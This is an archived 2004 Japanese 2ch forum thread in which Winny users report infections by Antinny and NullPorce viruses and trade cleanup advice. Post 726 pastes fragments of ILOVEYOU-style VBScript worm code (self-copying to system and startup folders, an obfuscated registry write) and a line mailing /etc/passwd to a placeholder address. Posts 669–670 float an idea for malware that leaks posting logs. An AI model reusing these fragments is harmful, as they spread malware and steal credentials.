粘着気持ちワル

618 :[名無し]さん(bin+cue).rar:04/08/18 07:34 ID:Qxd4sOz3
また朝からか・・・
定期テンプレ貼り厨ですよー

>>11

619 :[名無し]さん(bin+cue).rar:04/08/18 07:35 ID:Qxd4sOz3
起きたてでny総合質問スレと勘違いしてた・・・orz

620 :[名無し]さん(bin+cue).rar:04/08/18 09:23 ID:oU20S7uY
自作自演って久しぶりに見たよ

621 :[名無し]さん(bin+cue).rar:04/08/18 09:44 ID:yaCuwO3W
例の蓮コラscrに感染したんだけど対処法ってまだ無いですか?

622 :[名無し]さん(bin+cue).rar:04/08/18 09:51 ID:qE5lXQSq
㋦ฺ㋸ฺ㋭゚ฺฺ

623 :[名無し]さん(bin+cue).rar:04/08/18 09:53 ID:cn2o9soF
㋕”ッ

624 :[名無し]さん(bin+cue).rar:04/08/18 10:20 ID:Cy5+PnPB
>>621
それってスクリーンセーバーが蓮になる以外なんかするんだっけ?

対処法も何もどういう状況かという報告がほとんど出てないような
ただ蓮壁紙じゃなくスクリーンセーバーってだけじゃないのか?

625 :[名無し]さん(bin+cue).rar:04/08/18 10:51 ID:F5vZkR2G
>>621
俺はexeを削除してスクリーンセーバーを変えただけで直ったけど。

626 :[名無し]さん(bin+cue).rar:04/08/18 10:53 ID:NG9ZTLww
一番精神的なダメージが大きいのは
upリストdownリストをtxtにまとめてメール送信だな。

627 :[名無し]さん(bin+cue).rar:04/08/18 11:01 ID:cn2o9soF
>>626
ぜんぜんダメージないけど?

628 :[名無し]さん(bin+cue).rar:04/08/18 11:04 ID:2KzGKD15
そんなんよりヌルポースのほうが精神的ダメージが大きいと思うが
お気に入りとアドレス帳流すんだし

629 :[名無し]さん(bin+cue).rar:04/08/18 11:20 ID:QZd8a8ku
福山雅治 - 『fukuyama presents 虹 〜もうひとつの夏〜』(320kbps)(2004.07.28).zip
に付属していたexeを実行してしまいました・・・PCの電源を強制的に切りましたが、
どんなウィルスなのでしょうか?

630 :[名無し]さん(bin+cue).rar:04/08/18 11:22 ID:2GqHprf2
>>629
それは時限式でハードディスクを物理的に破壊するので
早くPCを窓から投げs(ry

631 :[名無し]さん(bin+cue).rar:04/08/18 11:37 ID:+BXF3329
福山ウイルスは1回でも再起動しちゃうともう対処しようが無いよ・・・

632 :[名無し]さん(bin+cue).rar:04/08/18 11:38 ID:oJkTqNky
>>629 ny内にあるexeをいちいち解析してくれる人なんてそうそういないと思うよ
    実行してしまったのならレジストリ・スタートアップ・タスクマネージャなどを使って
    どんなプロセスが動いているかを提示したらわかりやすいと思う
    再起動させたのならどうなるかはわからないヽ('A`)ノ

633 :[名無し]さん(bin+cue).rar:04/08/18 12:06 ID:cn2o9soF
  ざわ・・・・・


           ざわ・・・・

634 :591:04/08/18 12:52 ID:PA0wSJlp
>>591
脳豚先生でウイルス探索してみました。
ウイルスは見つからなかったんです。
ご迷惑かけました。
 パソコン本体に異常があったのかもしれないとも思いました。
 ちなみにemachinesです

635 :[名無し]さん(bin+cue).rar:04/08/18 12:58 ID:PRAPeWxk
「ノートンで検出せず=ウィルスなし」 ってわけじゃないけどな
まあもともとが>>591みたいな内容だしどうでもいいか

636 :[名無し]さん(bin+cue).rar:04/08/18 13:43 ID:lvjBuKVh
http://deridameyo.freeprohost.com/higechin/id.cgi?mode=get&thread=92746188IlYK

637 :[名無し]さん(bin+cue).rar:04/08/18 14:09 ID:evBCLYtC
【使用OS】XP
【WindowsUpdateしてるか】半年ほどしていない
【AntiVirusは】無い
【ちゃんとUpdateしてるか】していない
【スキャンした結果】↓
【オンラインスキャンしたならその結果は】worm_antinny.A
【Winnyのバージョン】確か2b722
【Winny歴、総DL量は】1年半ほど
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】まだ。
【症状か具体的に、分かる限りすべて書く】とりあえずUPフォルダにファイルがつくられてるようで重い
【何をしたらそんなことになったのか】zipファイル解答後、中にあったフォルダ風のexeファイルを誤って実行
【これまでにとった措置】オンラインスキャンを実行し、とりあえずウイルス感染フォルダを削除しました。
テンプレにはハードディスクをフォーマットした上で、Windowsの再インストールをする。
ことが共通の、絶対確実な対処方法とありますが、必ず上記のことを実行しなければならないのでしょうか?
また実行しなければ危険なのでしょうか?
オンラインウイルススキャンではやはり役不足でしょうか?

638 :[名無し]さん(bin+cue).rar:04/08/18 14:16 ID:O0uR0BBA
今時Antinny.Aごこいでオロオロしtんのは明らかにスキル不足

しかも、
> 【WindowsUpdateしてるか】半年ほどしていない
> 【AntiVirusは】無い
> 【ちゃんとUpdateしてるか】していない
ってのは自業自得の上にNetに繋ぐ資格無し

シマンテックやトレンドマイクロのサイトに有る対処法が理解できないのなら再インスコしか手段は無い

639 :[名無し]さん(bin+cue).rar:04/08/18 14:20 ID:PRAPeWxk
テンプレ理解してないだけ
worm_antinny.Aとわかってるんなら、手動駆除したらいいじゃない

オンラインスキャンでは不足とかじゃなく、もまえの知識不足
その調子じゃレジストリは残ってるんだろうなあ
手動駆除はどうしたらいいですか?という質問は受け付けない

きっとantinnyだけじゃなく、いろんなスパイウェアなんか飼ってるんだろうなあ

640 :[名無し]さん(bin+cue).rar:04/08/18 14:22 ID:957XIz+r
しかも
> 【Winnyのバージョン】確か2b722
だぜ。同情の余地がない…。それ自体が○×△だってのを知らないらしいな(w

641 :[名無し]さん(bin+cue).rar:04/08/18 14:23 ID:8l7UHnUA
再インスコついでに「役不足」を辞書で引いておけ

642 :[名無し]さん(bin+cue).rar:04/08/18 14:32 ID:Cg9NC5J6
こんなのがいるから未だにantinny付のファイルが流れてんだな。

643 :[名無し]さん(bin+cue).rar:04/08/18 14:34 ID:evBCLYtC
はい・・・そうですね・・・・・・

antinny.Aに.Jもあったんですね。
Jがキンタマですか・・・?
書きそびれましたがさっきの中にJもありました。

対処法には
1) Windowsのレジストリエディタ(regedit.exe)などを使用して以下のレジストリの値を削除してください。
2) コンピュータを再起動後、最新のウイルス対策プログラムを利用してウイルス検索を行い、検出したファイルをすべて「削除」してください。

とあるのですが、先にファイルを削除したあとでも↑これをしたほうがいいでしょうか?

644 :[名無し]さん(bin+cue).rar:04/08/18 14:38 ID:evBCLYtC
一応スパイウェアは定期的に検索、削除してるんですけれど…
自慢にならないですね…

645 :[名無し]さん(bin+cue).rar:04/08/18 15:08 ID:mzq3rK/f
トレンドのAntinny一覧
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=Antinny&alt=Antinny

あるだけやれ

646 :[名無し]さん(bin+cue).rar:04/08/18 15:13 ID:U3I83Vpv
>>643
さっさとリカバリしる

647 :[名無し]さん(bin+cue).rar:04/08/18 15:14 ID:qKE/qfiP
おそらく、そこにない解析されてない新しいantiももう有るんだろうね。
(((;゚Д゚)ガクガクブルブル

648 :637:04/08/18 15:25 ID:evBCLYtC
またレス失礼します。
レジストリエディタを用いてantinny.Aの対処方法どおり行いレジストリの値を削除できました。

そこで調子に乗ってantinny.Jの対処もしようと思いレジストリエディタを開いたのですが
ファイル名が直接分かっていないとレジストリの値を削除できないようなので

オンラインウイルススキャンを実行し、検索結果が出たウィンドウを見てファイル名を調べようとしたのですが
クリックしても↓のままでファイルのパスが全部表示されないのでファイル名が分からず削除できません。

ウィルス  駆除可能   ファイル 
antinny.A  いいえ   C\Documents and...
antinny.A  いいえ   C\Documents and...
antinny.A  いいえ   C\Documents and...
・・・
・・


どうすればファイルのパスがわかるのでしょうか?
ウイルスバスターの体験版をDLする等してもう一度検索しないと無理でしょうか?

649 :[名無し]さん(bin+cue).rar:04/08/18 15:27 ID:ACtK0lSL
この質問は初めてだ

650 :[名無し]さん(bin+cue).rar:04/08/18 15:31 ID:O0uR0BBA
初めてでも板違いには変わりない

分からなきゃトレンドマイクロに聞け

651 :[名無し]さん(bin+cue).rar:04/08/18 15:35 ID:BBWkJhIE
つうか斬新な質問だな。
皆が普通に考える方法でダメなら
トレンドマイクロに言ったら感謝してもらえるよ、きっと。

652 :637:04/08/18 15:41 ID:evBCLYtC
板違いですか・・・すいません。
ちなみにXP付属のウイルス検索ソフトならファイル名がわかるかとやってみてるんですけど
古いせいか全然ウイルス検出されず…

トレンドマイクロで調べてみましたがファイル名はどうやら分からないようなので
ウイルスバスターの体験版ダウンロードしてXP付属のファイアーウォールアンインストールしてから
ウイルスバスターインストールして検索してファイル名を知って
レジストリエディタを開いて値を削除して
再起動してまた検索して削除します。。

653 :[名無し]さん(bin+cue).rar:04/08/18 16:05 ID:U3I83Vpv
枠線をずらせばいいんじゃないの

654 :[名無し]さん(bin+cue).rar:04/08/18 16:06 ID:qKE/qfiP
努力は買う。

655 :[名無し]さん(bin+cue).rar:04/08/18 16:10 ID:u5OOn0Pe
まてこれは孔明の罠だ

656 :[名無し]さん(bin+cue).rar:04/08/18 16:24 ID:Cg9NC5J6
なんでそこまで手間かけるんだろう。データ退避させて
再インスコの方が早いだろうに。


657 :637:04/08/18 16:34 ID:evBCLYtC
再インスコよりこっちの方がはやい気がしたので…

>>653
色々やってみたんですけれど、枠線もずれませんでした。

658 :[名無し]さん(bin+cue).rar:04/08/18 16:42 ID:y3o2OTeb
もう休め!オマエはよくやったよ!無駄なことを

659 :[名無し]さん(bin+cue).rar:04/08/18 16:52 ID:ACtK0lSL
>>657
お得意のダボークリッコー使えよ
nyでファイル名長いときとかどうしてんだ


660 :[名無し]さん(bin+cue).rar:04/08/18 16:54 ID:U3I83Vpv
 { i   | ゙      、,,`' 、 ,           j
 レ'、,  |      ,:r'"''‐ `'゙、  ,、‐‐、      l
   ゝ」、 、 , ,、‐''゙゙、゙'、-――t'''/ / l     |    
    ,ゝ‐、_,',.  ' ,O 〉     V .( ゙, j     i    ウィルスは滅びぬ。
    ',.ヽソ. '、,,、 -'"       / /     j     何度でも蘇るさ
     '‐レ゙             .,r'    ノ
      l` `      、     i'" ゙ヽ、,/
.      ゙、  ,,、 -‐'"      ノ    ヽァ、
       ゙、'´ ..       ,r゙     ノ ヾ^゙ヽ、
.       ゙,        ./    ,、r'  /   \
        !、     /  ,、r'"   /      /`'ー-
         `'''"入 ̄ ,、r ''"   ,、/      /

661 :[名無し]さん(bin+cue).rar:04/08/18 17:00 ID:U3I83Vpv
>>637へのレスね

662 :[名無し]さん(bin+cue).rar:04/08/18 17:00 ID:yaCuwO3W
遅レスすまん
蓮コラscrなんだけどあくまでファイルがscrで壁紙が蓮コラになる奴ね
あんまし感染者いないようだからマターリ待ってます

663 :[名無し]さん(bin+cue).rar:04/08/18 17:04 ID:U3I83Vpv
>>662
害が無いなら飼っておけば
漏れだったら気持ちが悪いから、データを非難して再インスコするけどね

664 :637:04/08/18 17:05 ID:evBCLYtC
>>658
無駄だなんて言わないで…

>>659
ダブルクリックしたらウイルス情報に飛んだんです…。

今の状況なんですが
とりあえずantinny.Jのレジストリは無かったみたいで一安心です。
antinny.Aの方のレジストリは消したしあとは再起動してOKかな?

665 :[名無し]さん(bin+cue).rar:04/08/18 17:08 ID:U3I83Vpv
再起動したとたん、亜種であぼーん

666 :[名無し]さん(bin+cue).rar:04/08/18 17:10 ID:+BXF3329
>>665
嘘イクナイ
再起動したほうがいい、そうしたほうが対処しやすいし

667 :[名無し]さん(bin+cue).rar:04/08/18 17:11 ID:g6i4XE20
>>664
残ってるかもしれないと不安になるより
フォーマットかけちゃう方が安心すると思おうよ。

668 :[名無し]さん(bin+cue).rar:04/08/18 17:12 ID:cn2o9soF
ここは釣りの多いインターネッツですね

669 :[名無し]さん(bin+cue).rar:04/08/18 17:24 ID:oU20S7uY
嘘を嘘と(ry

やっぱりダメージでかいのは2chブラウザの書き込みログ流出だって。
人によってはマジで人生あぼーんする可能性があるし。
まぁ専ブラ使ってない香具師にはノーダメージなんだけど。

誰かこれ作ってよ。絶対大ブレイクするって!

670 :[名無し]さん(bin+cue).rar:04/08/18 17:26 ID:oU20S7uY
nyに流すんでなくて、勝手にろだに上げてそのアドレスを2chに勝手に書き込むようにすれば完璧

671 :637:04/08/18 18:27 ID:evBCLYtC
みなさん色々心配かけました。
さっき再起動したのちオンラインスキャンしましたが
ウイルスは検出されず無事に助かった模様でした。
ありがとうございました。

672 :[名無し]さん(bin+cue).rar:04/08/18 18:32 ID:F5vZkR2G
オンラインスキャンで何も出なかったから安全
なんて言ってるんならnyやらないほうが懸命だよ。

673 :[名無し]さん(bin+cue).rar:04/08/18 18:44 ID:wdQ9bgYU
antinnyってどれが一番危険なの?

674 :[名無し]さん(bin+cue).rar:04/08/18 18:50 ID:L+NVWdy+
>>671 おまいみたいな香具師が、1年半nyやってて
今までウィルスに感染しなかったのが不思議だな
おまいは、最低限ノートンかバスターをインスコしとけや
それかnyやめれ

675 :[名無し]さん(bin+cue).rar:04/08/18 18:52 ID:Sv5dU+VD
人間やめますか?Nyやめますか?

676 :[名無し]さん(bin+cue).rar:04/08/18 18:53 ID:S1QeM7hu
>>671
ウィルスソフトも火壁も無しでnyやってたのか・・・・
別の意味ですごいなお前。

677 :637:04/08/18 19:01 ID:evBCLYtC
>>672
え?
それは亜種とかの可能性のことですよね?

>>674
そうですね、今まで色んなウイルスにかかってきてた教訓があったので
nyでは出来るだけ怪しいファイルはチェックしようと心がけていたからだと思います。
(とか言ってウイルス踏んじゃいましたが…)
昨日個人的に大きく凹むことがあって寝れずにそれでPCを触っていたので
注意が散漫になったのせいもあって今回実行してしまったのじゃないかなと。。
それと一応XP標準のファイアーウォールはつけてました。

678 :569:04/08/18 19:10 ID:3d9mzmiN
>>588
サンクス!!
やっぱりこのツールは使ったがいいみたいですね。

679 :[名無し]さん(bin+cue).rar:04/08/18 19:11 ID:L4ari/qa
>>669
どの専ブラだ?
おれのOpen Janeには書き込みlogなんてないぞ。

680 :[名無し]さん(bin+cue).rar:04/08/18 19:12 ID:F5vZkR2G
>>677
まぁ亜種じゃなくても。
概出のやつでもオンラインスキャンに引っかからないやつは
いっぱいあるからねぇ。


681 :[名無し]さん(bin+cue).rar:04/08/18 19:19 ID:zOqt2TnA
マンガミーヤで書庫とかのファイル見てもキンタマって感染するの?


682 :[名無し]さん(bin+cue).rar:04/08/18 19:25 ID:gpIjV19a
>>669
ttp://up.isp.2ch.net/up/5fc43c2fc9ab.zip
ネタ投稿の山なんか見てもつまらんだろ。
試しに見てみろ。パス「winny」

683 :[名無し]さん(bin+cue).rar:04/08/18 19:32 ID:ACtK0lSL
>>682
勇気が無くて見られない画像解説スレで答えてるのにワロタ

684 :[名無し]さん(bin+cue).rar:04/08/18 19:36 ID:2GqHprf2
ヽ(´ー`)ノ

使いすぎ




おまいのげんしけん大野スレの書き込み読んだ覚えがあったな・・・

685 :[名無し]さん(bin+cue).rar:04/08/18 19:39 ID:BNF+kSTC
マジンガー乙

686 :[名無し]さん(bin+cue).rar:04/08/18 19:42 ID:dotQuH1n
スレイプニルでクリップボードから読み込みオンにした状態で
全文コピーしたらすごい事になった



・・・・ってこれおまいがブラクラorスパイウェアへのリンク貼ってたら非常に危険だったなw

687 :[名無し]さん(bin+cue).rar:04/08/18 19:50 ID:HyFY/Y7w
>>679
kakikomi.txtってない?live2chにはあるよ。

688 :[名無し]さん(bin+cue).rar:04/08/18 19:55 ID:BNF+kSTC
>>679
設定 - 基本 - 書き込み - 書き込み履歴を kakikomi.txtに保存する

689 :[名無し]さん(bin+cue).rar:04/08/18 19:55 ID:ACtK0lSL
>>687
JaneDoeViewだが、txt出力するかしないか選べる
検索したら>>682のみhit

690 :[名無し]さん(bin+cue).rar:04/08/18 19:59 ID:B8knE0rq
■暗号アルゴリズムに重大な欠陥発見の報告相次ぐ(04/08/18)

 一般的なセキュリティ用アプリケーションに含まれる数学アルゴリズムに、これまで知られて
いなかった脆弱性が存在する可能性があるとのニュースに、暗号専門家のコミュニティが
大騒ぎになっている。

 事の起こりは12日、フランスのコンピュータ科学者Antoine Jouxが、デジタル署名によく利用される
有名な「MD5」アルゴリズムに欠陥を見つけたと発表したことだった。その後中国の4人の研究者が
論文を発表し、別のアルゴリズム「SHA-0」を迂回する方法を報告した。
 これらの報告は予備的なものだが、最終的にはこれらの発見によって――別の、より安全な
アルゴリズムが採用されない限り――侵入者がコンピュータコードに検知不能な裏口を挿入したり、
電子署名を偽造したりしやすくなる可能性もある。

 第3の発表は、カリフォルニア州サンタバーバラでの「Crypto 2004」カンファレンスで17日夜
(米国時間)に予定されている。この発表は多くの関係者が期待しているもので、さらにドラマチックな
内容となる可能性がある。
 Israel Institute of Technologyの研究者、Eli BihamとRafi Chenらは当初、欠陥の存在が知られている
SHA-0アルゴリズムのセキュリティ攻撃方法を示す論文を発表する予定だった。だが彼らは予定を変更し
西海岸時間午後7時開始予定のカンファレンスセッションで「SHA-1」アルゴリズムの「ニュース速報」を
発表すると約束している。

以下、ソース

http://www.itmedia.co.jp/enterprise/articles/0408/18/news020.html

691 :[名無し]さん(bin+cue).rar:04/08/18 20:00 ID:2KzGKD15
見られたらやばいから俺は保存しないようにしている

692 :[名無し]さん(bin+cue).rar:04/08/18 20:24 ID:5YeQrx8y
【使用OS】XP
【WindowsUpdateしてるか】YES
【AntiVirusは】未使用
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】1.12
【Winny歴、総DL量は】1年くらい?
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】DOWNフォルダ内のファイルがUPフォルダにコピーされる
【何をしたらそんなことになったのか】偽装アイコンを誤ってクリック
【これまでにとった措置】特になし

キンタマタイプとは違うようなのですが、この種のウィルスの情報など
お持ちでしょうか?

693 :[名無し]さん(bin+cue).rar:04/08/18 20:27 ID:CBikW7VT
お前、住人はノートンじゃないぞ

694 :[名無し]さん(bin+cue).rar:04/08/18 20:28 ID:/fP7PrIR
>>692
【AntiVirusは】未使用 この時点でまったく話しにならない

695 :[名無し]さん(bin+cue).rar:04/08/18 20:30 ID:MOdKaDp7
>>693
ワロタ
>>692
上の方で使って四苦八苦してる人もいるが
ノートンなりバスターなり体験版を使えば100%ではないけど種類はわかる。

696 :[名無し]さん(bin+cue).rar:04/08/18 21:05 ID:L4ari/qa
>>687
無かった。
>>688
設定で変えれるのか。知らなかった_| ̄|○
チェックはずれてたから無いはずだわな。

697 :229:04/08/18 21:43 ID:x2HDsM7l
やっと送ったヌルポースに17日付の定義ファイルで対応した・・・・
長かった
これに入ってるヌルポースね
18禁ゲーム [040806] 燐月DVD版 クラックパッチ.rar


698 :[名無し]さん(bin+cue).rar:04/08/18 21:46 ID:S1QeM7hu
>>697
乙。

699 :[名無し]さん(bin+cue).rar:04/08/18 22:32 ID:xdCDp3bw
解凍しただけで感染するウィルスってある?
ヌルポースはそれだとか聞いたんだけどホントにそんなウィルスあるの?


700 :[名無し]さん(bin+cue).rar:04/08/18 22:39 ID:+BXF3329
あるよ、だからみんなひっかかるんじゃないか・・・

701 :[名無し]さん(bin+cue).rar:04/08/18 22:40 ID:F5vZkR2G
前にその質問したとき自己解凍のやつ以外はないって言われたけど。

702 :[名無し]さん(bin+cue).rar:04/08/18 22:47 ID:O0uR0BBA
>>699
無いと言えば無いが、有ると言えば有る

件の脆弱性を利用して、スタートアップに.exeを投下するのは感染行為と言えなくもない

アーカイバの設定によっては「解凍後にフォルダを開く」から.folder連携で.exe実行ってのも有る
こっちはユーザの脆弱性な


つかageんなよ、頼むから

703 :[名無し]さん(bin+cue).rar:04/08/18 22:51 ID:S1QeM7hu
ageるバカにマジレスしないこと。

704 :[名無し]さん(bin+cue).rar:04/08/18 22:57 ID:7lmnkG+Z
11時前にタバコ買ってきます

705 :[名無し]さん(bin+cue).rar:04/08/18 23:04 ID:P312xcbO
さくらたんヽ(´ー`)ノ


のウィルスキボンヌ

706 :[名無し]さん(bin+cue).rar:04/08/18 23:38 ID:+31/gHHX
>>705
さくらたん!!イイ!!(・Ω・)/

707 :[名無し]さん(bin+cue).rar:04/08/18 23:51 ID:ED4hQIAK
【使用OS】 WinXP Pro
【WindowsUpdateしてるか】 している
【AntiVirusは】 ウイルスバスター2004
【ちゃんとUpdateしてるか】 している
【スキャンした結果】 ウイルス無し
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】 v2 b7.1
【Winny歴、総DL量は】 1年くらい
【テンプレを読んだか】 読みました
【テンプレにある対策を実行したか】
テンプレに近い症状があったので、確認したところ
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。 が該当、即削除
【症状か具体的に、分かる限りすべて書く】 タスクマネージャが開かず、代わりにレジストリエディタが開く
ny起動しても変わった様子は見られず
【何をしたらそんなことになったのか】 偽装フォルダアイコンの実行ファイルを実行・・・
【これまでにとった措置】
ウイスルスキャン・・・ウイルス検出せず
システム復元・・・タスクマネージャーは開く様になった

これは一体どのタイプに該当するのでしょう?
タスクマネージャーが復帰しても安心できませんかね・・・

708 :[名無し]さん(bin+cue).rar:04/08/19 00:01 ID:jfADrd6G
     ┌─┐  ┌─┐
      │●│  │●│
      └─┤  └─┤
      _   ∩   _  ∩ いっぽん!
    ( ゚∀゚)彡  ( ゚∀゚)彡  にっぽん!
 ┌─┬⊂彡┌─┬⊂彡
 |●|    |●|
 └─┘    └─┘


709 :[名無し]さん(bin+cue).rar:04/08/19 00:13 ID:KHA1Phg9
bugfixをつくるのはNullPorce系
タイプは壁紙変更してアドレス帳流すだけのやつから、再起動したらファイル削除するやつだの
いろいろで少しずついろんなやつがでて
現在進行形なのでアンチウィルスソフトの対応も一部

どれかは知らんが、今のところでてるやつは駆除は比較的容易

710 :[名無し]さん(bin+cue).rar:04/08/19 00:17 ID:DCKaWL5O
>>709
ありがとうございます。
取り敢えず、トレンドマイクロに解析投げてみました。

711 :[名無し]さん(bin+cue).rar:04/08/19 00:43 ID:KuZnQjtm
ウイルス?HDD全消去?
割れやってんだ
覚悟はとうに出来ている

・・・
   ・・・
 ・・・
orz

712 :[名無し]さん(bin+cue).rar:04/08/19 00:45 ID:/wqrdk3m
>>710 先生で反応するか試したい コピーがあるならうpしてくれまいか?
    反応しない場合は先生宅へ送る

713 :[名無し]さん(bin+cue).rar:04/08/19 00:59 ID:DCKaWL5O
>>712
今、オンライン先生にてスキャン中です。
やけに、テンプレとの該当項目が少なく
新手の破壊力がありそうで、ガクブルですよ・・・


714 :[名無し]さん(bin+cue).rar:04/08/19 01:15 ID:qGhvtgqc
このスレ、酒の肴にもってこいだな
もっと慌てまくってるやついないけーw

715 :[名無し]さん(bin+cue).rar:04/08/19 01:18 ID:KN4ODLPW
>>714
オマイが酔っぱらって何かWクリック汁

その慌てっぷりを肴に俺が呑むから

716 :[名無し]さん(bin+cue).rar:04/08/19 01:46 ID:FwqEJGxm
来週あたり、大量に対応しそうなヨカン………夏だなぁ(´・ω・`)

717 :710:04/08/19 01:51 ID:DCKaWL5O
バスター2004・・・未発見
オンラインバスター(一応)・・・未発見
オンライン先生・・・Trojan dropper
でした・・・orz (バスターいざって時に役に立たんかった・・・)
Trojan dropperって何するとですか?
先生のサイトでは
「トロイの木馬またはバックドアトロイの木馬を投下して実行するだけです。」
だけですって言われても・・・
実行してしまった後の対処法は載ってないし。


718 :[名無し]さん(bin+cue).rar:04/08/19 01:59 ID:/wqrdk3m
>>710 こんなところだそうだ http://www.f-secure.co.jp/glossary/?KEYWORD=Dropper
    うpは無理そうですな 事後対処中に申し訳なかった

719 :[名無し]さん(bin+cue).rar:04/08/19 02:06 ID:yB58LsyK
Trojan dropperはこっち
ttp://www.f-secure.co.jp/glossary/?KEYWORD=Trojan%20Dropper

なかなか高度になってきたな。

720 :[名無し]さん(bin+cue).rar:04/08/19 03:11 ID:Ipi2+iQ2
>>56
これのあとから表示がおかしいのだがなぜ?いたずら?

721 :[名無し]さん(bin+cue).rar:04/08/19 03:17 ID:481U4PFC
>720
「&#18」をNGワードに設定して、再読み込み。
設定するときはすべて半角で。

722 :[名無し]さん(bin+cue).rar:04/08/19 04:56 ID:nPZ2jttm
ウィルスかかっちゃって
対策方がわかんなかったから綺麗に
クリーンインスコしたんだけど、
これって何のウィルスなんだろ?

「症状」
フォルダ内のtxt等を上書きして298キロバイトの文字で上書き。
中身はぬるぽ・・・・ガッ(名前)とでる。


723 :[名無し]さん(bin+cue).rar:04/08/19 04:59 ID:8/0Iwp+0
あんちにー

724 :720:04/08/19 05:44 ID:VVo0JAwc
>>721
ありがとうございます。表示元に戻りました

725 :722:04/08/19 05:57 ID:nPZ2jttm
>>723
答えてくれてありがと。
おれもあんちにーだとおもってたんだけど、
いきなり画面に血みたいのが画面いっぱいにでてきてぬるぽってでたり
Zipとかにも感染してたからどの亜種か判断つかんかった。
これってお気に入りとかアドレスが漏れるタイプなんかな?

726 :[名無し]さん(bin+cue).rar:04/08/19 09:11 ID:jFxi+2Nz
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirwin&"\Win32DLL.vbs") ܵ ܶ ܷ
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

専ブラなら2chの「log」を、IEなら「Temporary Internet Files」を『除外』に設定しよう!

727 :[名無し]さん(bin+cue).rar:04/08/19 09:51 ID:Ye5XbjGd
(同人ゲーム)(C66) [Atelier-G] クイズで脱衣っ! りみてっど (ふたりはプリキュア カードキャプターさくら まほろまてぃっく など).rar a7Lt7xn5Gh 119,765,944 5609188de12ed3c3eff7049866e3085c

これ落として実行してみたんだけど、反応がなかった。
なんのウィルスか知ってる方情報ヨロ。


728 :[名無し]さん(bin+cue).rar:04/08/19 10:04 ID:GYu3GgaT
わざと言うがありきたりな釣りには放置するのが一番

729 :[名無し]さん(bin+cue).rar:04/08/19 10:16 ID:Ye5XbjGd
>>728 すいません。そんなつもりじゃなかったのですが。
クリックしても反応がなかったのでウィルスかと思って聞いてみたんですけど。
それと、マルチスマセン。


730 :[名無し]さん(bin+cue).rar:04/08/19 10:49 ID:3G5aZESj
落として判定しろと?

731 :[名無し]さん(bin+cue).rar:04/08/19 10:56 ID:xr1ZqscJ
いいか、ぽまいら

        (゚д゚ )
        (| y |)

金玉という言葉は

      金  ( ゚д゚)  玉
       \/| y |\/

    二つ合わさって金玉となる

        ( ゚д゚) 金玉
        (\/\/

つまり、ぽまいらは金玉でしかないと言うことだ

        (゚д゚ )
        (| y |)


732 :[名無し]さん(bin+cue).rar:04/08/19 11:02 ID:vPa/CGP/
http://higemoja.space4free.de/tri_yossi.php
http://higemoja.ultraserver.org/tri_yossi.php
http://madboy723.hypermart.net/script/up/sbbs.php
http://higemoja.space4free.de/tri_yossi.php
http://higemoja.ultraserver.org/tri_yossi.php
http://madboy723.hypermart.net/script/up/sbbs.php

733 :[名無し]さん(bin+cue).rar:04/08/19 15:07 ID:gBSFcdUp
>>726
貼るなヴォケ

734 :[名無し]さん(bin+cue).rar:04/08/19 18:20 ID:UvPOlUQH

昔はDOWN、CASHのフォルダを移動して再設定してもエラーでなかったのに、最近書き込み違反
が出て移動できん。
これもウィルスじゃないかと。


そんなわけねーけど。


735 :[名無し]さん(bin+cue).rar:04/08/19 19:55 ID:iefLJovx
デスクトップには何も置いてなくDドライブに個人的な写真を保存している
のですが、それがupフォルダにうpされてしまいます。
今も【晒し上げ】とか勝手に作られて個人的な画像がはいっています。
かなり鬱です・・・どう対処すればいいですか?orz

736 :735:04/08/19 19:59 ID:iefLJovx
今、winnyやってみたら俺のファイルが知らない奴らの手に・・orz
結構流通してるよ俺のファイル

737 :[名無し]さん(bin+cue).rar:04/08/19 20:01 ID:7HoV1XCG
もう回収不可能です。有名人になれたと思って割り切ってください。

738 :[名無し]さん(bin+cue).rar:04/08/19 20:07 ID:sOkRzrF7
お前のログインIDは何にしてる?



739 :[名無し]さん(bin+cue).rar:04/08/19 20:37 ID:NFI07+YE
5年もたてば思い出だよ、みじめでも必死に生きようぜ、互いに。

740 :[名無し]さん(bin+cue).rar:04/08/19 20:40 ID:C+Z0J89V

“ぬるぽウイルス”は新たな手法を用いた画期的なウイルス
〜新たなぬるぽウイルスに感染しないためにも、圧縮ツールの確認を
http://internet.watch.impress.co.jp/cda/special/2004/08/19/4290.html

741 :[名無し]さん(bin+cue).rar:04/08/19 21:56 ID:Q89bTpyV
ヌルポースはwinrar使ってれば怖くないってこと?
んなこたぁーないか?

742 :[名無し]さん(bin+cue).rar:04/08/19 22:17 ID:Eg6RDufn
winrarは、実行ファイルのうっかりダブルクリックが起こるからな

743 :[名無し]さん(bin+cue).rar:04/08/19 22:17 ID:/wqrdk3m
>>741 どのアーカイバが優れているかなんてのは人それぞれだと思う
    脆弱性に対応していて、なおかつ自分で常日頃警戒しておけば
    どれでも一緒だと思う 
    http://pc5.2ch.net/test/read.cgi/software/1084901121/ ここでも見てくださいな

744 :[名無し]さん(bin+cue).rar:04/08/19 22:55 ID:Q89bTpyV
>>743
